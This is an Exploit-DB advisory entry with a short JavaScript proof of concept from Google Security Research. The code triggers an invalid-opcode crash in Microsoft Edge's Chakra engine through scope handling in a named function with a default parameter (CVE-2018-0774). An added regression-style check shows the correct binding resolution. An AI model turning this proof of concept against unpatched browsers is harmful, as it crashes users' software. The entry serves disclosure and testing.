Microsoft Edge Chakra - Incorrect Scope Handling

EDB-ID: 43715
Author: Google Security Research
Published: 2018-01-17
CVE: CVE-2018-0774
Type: DoS
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

  
(function func(arg = function () {
    print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {

    }
})();

// Chakra fails to distinguish whether the function is referenced in the param scope and ends up emitting an invalid opcode.
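
The binding resolution a conforming engine is expected to produce for this construct, written as a regression-style check. This is an added example, not part of the original advisory or of Chakra's code; it assumes a Node.js runtime, and the helper names `pocShape`, `controlShape` and `checkScopes` are hypothetical.

```javascript
// Added example (not from the advisory): expected ES2015+ binding resolution
// for the construct in the PoC. Helper names are hypothetical.

// Case 1: same shape as the PoC. The body redeclares `func`.
function pocShape() {
    const seen = {};
    const outer = function func(arg = function () {
        // Parameter scope: `func` is not a parameter, so the lookup falls
        // through to the named function expression's own binding.
        seen.param = func;
        return 'default';
    }()) {
        // Body scope: the hoisted declaration below shadows the outer name.
        seen.body = func;
        seen.arg = arg;
        function func() { return 'inner'; }
    };
    outer();
    return { outer, ...seen };
}

// Case 2: control. Without the inner declaration both scopes see `outer`.
function controlShape() {
    const seen = {};
    const outer = function func(arg = function () {
        seen.param = func;
    }()) {
        seen.body = func;
    };
    outer();
    return { outer, ...seen };
}

// Summarise what each scope resolved `func` to.
function checkScopes() {
    const a = pocShape();
    const b = controlShape();
    return {
        paramSeesOuter: a.param === a.outer,
        bodySeesInner: a.body !== a.outer && a.body() === 'inner',
        defaultEvaluated: a.arg === 'default',
        controlBothOuter: b.param === b.outer && b.body === b.outer,
    };
}

console.log(checkScopes());
```

All four flags are `true` on an engine that keeps the parameter scope and the body scope separate.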
